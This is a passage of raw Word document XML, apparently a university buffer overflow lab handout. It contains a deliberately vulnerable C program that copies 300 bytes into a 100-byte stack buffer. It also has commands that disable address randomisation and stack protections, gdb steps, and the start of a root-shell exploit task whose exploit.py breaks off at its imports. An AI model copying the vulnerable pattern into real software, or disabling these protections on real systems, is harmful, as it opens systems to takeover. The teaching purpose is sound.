                          <w:p w14:paraId="0A1C2BFD" w14:textId="2FDC2237" w:rsidR="005A5A51" w:rsidRPr="00524497" w:rsidRDefault="005A5A51" w:rsidP="0002561C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fread(str, sizeof(char), 300, badfile);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2B196011" w14:textId="77777777" w:rsidR="001726BE" w:rsidRPr="00524497" w:rsidRDefault="001726BE" w:rsidP="0002561C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803D892" w14:textId="523FED00" w:rsidR="00C40CD3" w:rsidRPr="00524497" w:rsidRDefault="00C40CD3" w:rsidP="0002561C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foo(str);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="79740B7D" w14:textId="7B8B9C6D" w:rsidR="00C40CD3" w:rsidRPr="00524497" w:rsidRDefault="00943C47" w:rsidP="0002561C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printf("Returned Properly\n");</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35FD0C97" w14:textId="77777777" w:rsidR="008F0376" w:rsidRPr="00524497" w:rsidRDefault="008F0376" w:rsidP="0002561C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533A056" w14:textId="5B5A02D3" w:rsidR="00943C47" w:rsidRPr="00524497" w:rsidRDefault="00943C47" w:rsidP="0002561C">
                            <w:pPr>
                              <w:ind w:firstLine="5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 1;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="49FC69B9" w14:textId="77777777" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C" w:rsidP="000256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244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73F6" id="Text Box 3" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:20.3pt;width:468pt;height:251.2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" fillcolor="#e7e6e6 [3214]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="39FD4AF5" w14:textId="3EA00862" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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/* </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="008106AE"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</w:t>
                      </w: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.c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45315DDD" w14:textId="2DEC8619" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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stdlib.h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65E12FB1" w14:textId="3CB26D1A" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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241063E6" w14:textId="7BCF1D67" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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string.h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132A6EE2" w14:textId="77777777" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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foo(</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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char *str)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C61590D" w14:textId="77777777" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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3CF1C563" w14:textId="2503C19B" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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char </w:t>
                      </w:r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buffer[</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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100];</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C272323" w14:textId="1882E122" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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strcpy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buffer, str);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="70038753" w14:textId="18ADF6AC" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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return </w:t>
                      </w:r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1;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="159F5678" w14:textId="77777777" w:rsidR="00055BA1" w:rsidRPr="00524497" w:rsidRDefault="009857D7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3A803A2" w14:textId="0658BEE0" w:rsidR="009857D7" w:rsidRPr="00524497" w:rsidRDefault="009857D7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1EABE5B" w14:textId="7CBA52B0" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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="00FE3B90"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="00FE3B90"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="00FE3B90"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char **</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidR="00FE3B90"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75955F14" w14:textId="77777777" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C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7E6D810A" w14:textId="315047BD" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="00FE3B90" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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char </w:t>
                      </w:r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str[</w:t>
                      </w:r>
                      <w:proofErr w:type="gram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400]</w:t>
                      </w:r>
                      <w:r w:rsidR="0002561C"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FDCF0E7" w14:textId="07347A40" w:rsidR="00FE3B90" w:rsidRPr="00524497" w:rsidRDefault="00FE3B90" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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FILE *</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/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badfile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0342AC64" w14:textId="77777777" w:rsidR="001726BE" w:rsidRPr="00524497" w:rsidRDefault="001726BE" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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40FC800" w14:textId="0C53E8F1" w:rsidR="00130240" w:rsidRPr="00524497" w:rsidRDefault="00130240" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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badfile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badfile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", "r");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A1C2BFD" w14:textId="2FDC2237" w:rsidR="005A5A51" w:rsidRPr="00524497" w:rsidRDefault="005A5A51" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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fread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str, </w:t>
                      </w:r>
                      <w:proofErr w:type="spell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sizeof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(char), 300, </w:t>
                      </w:r>
                      <w:proofErr w:type="spell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badfile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B196011" w14:textId="77777777" w:rsidR="001726BE" w:rsidRPr="00524497" w:rsidRDefault="001726BE" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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803D892" w14:textId="523FED00" w:rsidR="00C40CD3" w:rsidRPr="00524497" w:rsidRDefault="00C40CD3" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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foo(str</w:t>
                      </w:r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79740B7D" w14:textId="7B8B9C6D" w:rsidR="00C40CD3" w:rsidRPr="00524497" w:rsidRDefault="00943C47" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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"Returned Properly\n");</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35FD0C97" w14:textId="77777777" w:rsidR="008F0376" w:rsidRPr="00524497" w:rsidRDefault="008F0376" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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533A056" w14:textId="5B5A02D3" w:rsidR="00943C47" w:rsidRPr="00524497" w:rsidRDefault="00943C47" w:rsidP="0002561C">
                      <w:pPr>
                        <w:ind w:firstLine="5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return </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/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1;</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                    </w:p>
                    <w:p w14:paraId="49FC69B9" w14:textId="77777777" w:rsidR="0002561C" w:rsidRPr="00524497" w:rsidRDefault="0002561C" w:rsidP="000256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244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C04E8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Consider the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r w:rsidR="00DC04E8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1917421D" w14:textId="5F036AC5" w:rsidR="0062170E" w:rsidRDefault="00A91A2C" w:rsidP="009C1D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91A2C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91A2C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack_gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EB0B4" w14:textId="798E26AE" w:rsidR="00A91A2C" w:rsidRPr="00053899" w:rsidRDefault="00A91A2C" w:rsidP="009C1D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CD947" w14:textId="71F713B3" w:rsidR="00A91A2C" w:rsidRDefault="00A91A2C" w:rsidP="009C1D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r w:rsidR="00053899" w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stack.c</w:t>
      </w:r>
      <w:r w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -z execstack</w:t>
      </w:r>
      <w:r w:rsidR="00053899" w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fno-stack-protector -g</w:t>
      </w:r>
      <w:r w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:r w:rsidR="00053899" w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack_gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790365C" w14:textId="71917100" w:rsidR="0078587B" w:rsidRDefault="00A66052" w:rsidP="009C1D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="12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C</w:t>
      </w:r>
      <w:r w:rsidR="00B46C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">reate a file </w:t>
      </w:r>
      <w:r w:rsidR="00B46C2C" w:rsidRPr="00B46C2C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r w:rsidR="00B46C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A420BF">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>to guarantee that the program can be executed correctly</w:t>
      </w:r>
      <w:r w:rsidR="00E76521">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00A420BF">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46C2C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FEC67E" w14:textId="77777777" w:rsidR="0078587B" w:rsidRDefault="00B46C2C" w:rsidP="009C1D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B46C2C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>touch badfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0C7B3" w14:textId="58A159CC" w:rsidR="00147668" w:rsidRDefault="00B46C2C" w:rsidP="009C1D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">After that, debug </w:t>
      </w:r>
      <w:r w:rsidRPr="00053899">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack_gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B46C2C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71492D99" w14:textId="46873881" w:rsidR="00053899" w:rsidRDefault="00B46C2C" w:rsidP="009C1D04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B46C2C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gdb stack_gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7B77BD" w14:textId="09D2BB8A" w:rsidR="00251CF5" w:rsidRDefault="0072148F" w:rsidP="00C5213B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Inside the debugging environment, </w:t>
      </w:r>
      <w:r w:rsidR="00147668">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">set a break point at function </w:t>
      </w:r>
      <w:r w:rsidR="00147668" w:rsidRPr="006E3F4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r w:rsidR="00251CF5">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFA125C" w14:textId="02C7EDC2" w:rsidR="00C5213B" w:rsidRPr="00B322A2" w:rsidRDefault="00251CF5" w:rsidP="00251CF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B322A2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>b foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E870C72" w14:textId="15C3A685" w:rsidR="009D1C95" w:rsidRPr="00192C82" w:rsidRDefault="009D1C95" w:rsidP="00192C82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Then run the program using </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1C95">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1C95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1C95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>command.</w:t>
      </w:r>
      <w:r w:rsidR="00192C82">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00192C82" w:rsidRPr="00192C82">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the program, print out the value of the frame pointer </w:t>
      </w:r>
      <w:r w:rsidR="00192C82" w:rsidRPr="00192C82">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidR="00192C82" w:rsidRPr="00192C82">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36C7A9" w14:textId="52FAE7D1" w:rsidR="00192C82" w:rsidRPr="00192C82" w:rsidRDefault="00192C82" w:rsidP="00192C82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00192C82">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>p $ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154A0D7" w14:textId="1CD627CC" w:rsidR="00192C82" w:rsidRPr="00C5213B" w:rsidRDefault="00192C82" w:rsidP="00192C82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">Describe your observation: what is the value of frame pointer </w:t>
      </w:r>
      <w:r w:rsidRPr="00192C82">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD7C17" w14:textId="7C7C4AA4" w:rsidR="006F0A12" w:rsidRDefault="006F0A12" w:rsidP="006F0A12">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0A12">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Task 4: </w:t>
      </w:r>
      <w:r w:rsidR="00291414">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00332B0E" w:rsidRPr="00332B0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ex</w:t>
      </w:r>
      <w:r w:rsidR="00332B0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ploit the buffer overflow vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CA5A9D" w14:textId="3F283E39" w:rsidR="006F0A12" w:rsidRDefault="008E69A0" w:rsidP="006F0A12">
      <w:p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In this task, we study </w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">how we can exploit the buffer overflow vulnerability to </w:t>
      </w:r>
      <w:r w:rsidR="00B22786" w:rsidRPr="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>launch</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> a buffer overflow attack, which compromise</w:t>
      </w:r>
      <w:r w:rsidR="00FA68C8">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Set-UID program </w:t>
      </w:r>
      <w:r w:rsidR="00B22786" w:rsidRPr="00847666">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>stack.c</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> and cause</w:t>
      </w:r>
      <w:r w:rsidR="00C4224E">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> it to invoke a shell program with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="00BD0C5C">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since we have found the value of frame pointer </w:t>
      </w:r>
      <w:r w:rsidR="00B22786" w:rsidRPr="00847666">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:r w:rsidR="007B56F4">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> proceed </w:t>
      </w:r>
      <w:r w:rsidR="007B56F4">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>with the</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B56F4">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t>construction of</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00B22786" w:rsidRPr="00847666">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r w:rsidR="00B22786">
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05673F" w14:textId="25FCED5B" w:rsidR="00655E1D" w:rsidRDefault="00655E1D" w:rsidP="000F5031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First, remove the </w:t>
      </w:r>
      <w:r w:rsidRPr="00655E1D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times" w:hAnsi="Times"/>
        </w:rPr>
        <w:t xml:space="preserve"> created in the last task: </w:t>
      </w:r>
      <w:r w:rsidRPr="00655E1D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>rm -f badfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FBC1AA" w14:textId="54B6CC2E" w:rsidR="00334AEE" w:rsidRDefault="004D03B3" w:rsidP="000F5031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CAFCC03" wp14:editId="2E946131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5943600" cy="4143375"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
                <wp:wrapTight wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21650"/>
                    <wp:lineTo x="21600" y="21650"/>
                    <wp:lineTo x="2160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14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2641A" w14:textId="485F0398" w:rsidR="00A76B6F" w:rsidRPr="009C1AAB" w:rsidRDefault="00A76B6F" w:rsidP="000F503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#!/usr/bin/python3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="77F8CBE3" w14:textId="6F9A5103" w:rsidR="000F5031" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A" w:rsidP="000F503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</w:t>
                            </w:r>
                            <w:r w:rsidR="00035832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exploit</w:t>
                            </w:r>
                            <w:r w:rsidR="000F5031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</w:t>
                            </w:r>
                            <w:r w:rsidR="00D65742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py</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="288D9ADF" w14:textId="0E22D5CE" w:rsidR="000F5031" w:rsidRPr="009C1AAB" w:rsidRDefault="000F5031" w:rsidP="000F503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9710119" w14:textId="7D0AEEE7" w:rsidR="00D65B1A" w:rsidRPr="009C1AAB" w:rsidRDefault="00D65B1A" w:rsidP="000F503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import sys</w:t>
                            </w:r>
                          </w:p>
